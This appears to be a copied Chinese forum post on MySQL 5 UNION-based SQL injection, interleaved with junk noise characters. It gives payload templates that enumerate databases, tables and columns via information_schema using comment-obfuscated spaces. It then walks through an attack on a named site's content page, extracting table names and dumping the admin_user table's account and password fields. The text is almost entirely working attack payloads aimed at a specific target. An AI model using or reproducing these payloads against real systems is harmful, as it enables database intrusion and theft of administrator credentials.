查库! H& U7 S) n. w$ @& a
$ `" A; L; k5 l/ ^
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
/ h/ i: c, B+ \& f/ K, i% {' b2 {, c" l
查表 T3 C0 `' ]% ]0 s4 W7 e2 V
, w9 v( s, G! x1 l* ]
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
: a: g) `$ f8 \5 N+ [9 I7 H& X9 ?
查段) {4 [' \7 B9 a) h0 Z: a
' U! s1 Z7 n6 a \6 v. sid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
/ I" X9 E( ~* a7 l1 M* x9 I, Q
* }/ ?) M2 P8 M! ~$ B' w0 r
& k& K$ T' {" z9 ?* V Bmysql5高级注入方法暴表
3 O7 r4 v% b+ H0 I5 Y7 b+ Z
0 y- j* D( ]: w例子如下: D0 D1 D: z5 Y8 V: ?
4 r' x* x) G' h1.爆表
7 }! n0 g% U( L* Khttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)$ g+ n' {8 q8 y; Q
这样爆到第4个时出现了admin_user表。! t/ | z' f- }& z7 h0 l
( j" z! H8 L% p2.暴字段
8 R6 e+ T9 R0 ~7 ahttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
p" w# }& ^, f& Q& t4 |1 q$ S2 A3 X5 p6 [" R; h- P
" `6 n" w2 {% C7 |. B6 E* s
3.爆密码 w9 L6 `2 D8 r8 b" U9 J3 [
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
* p& k/ K x) L: Z( }* M, ]: l8 x4 S. P# I
* N+ V# k! H$ N; Y3 G( X |